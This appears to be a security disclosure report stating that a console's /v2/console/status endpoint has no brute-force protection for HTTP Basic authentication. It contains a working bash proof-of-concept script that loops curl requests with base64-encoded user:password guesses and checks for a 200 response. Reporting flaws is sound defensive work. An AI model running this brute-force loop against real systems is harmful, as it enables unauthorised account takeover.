Description

According to the fix of the previous report, the login page has a rate limit mechanism to block the user’s IP when many attempts are made. The endpoint, for example, /v2/console/status only returns the content when who made the request has the correct rights. However, this request is not being handled against brute-force attacks.

Proof of Concept

The attacker can use Authorization: Basic, represented by a base64 string containing <user>:<password>. So the attacker only needs to send <user>:<password> via the HTTP header Authorization, and check the HTTP response code (200).

#!/bin/bash

HOST="localhost"
PORT=7351

USER="admin"
PASSWORD="password"

request() {
  token=$1
  
  res=$(curl -i -s -k "http://$HOST:$PORT/v2/console/status" \
    -H "Authorization: Basic $token" | head -n1 | grep 200)

  if [[ $res != '' ]]; then
    echo ">>> Found: $(echo $token | base64 -d)"
  else
    echo "Wrong: $(echo $token | base64 -d)"
  fi
}

# 1000 wrong tries
for i in {1..1000}; do
  request $(echo -n "user:password$i" | base64)
done

request $(echo -n "$USER:$PASSWORD" | base64)

Impact

Login bruteforce attacks.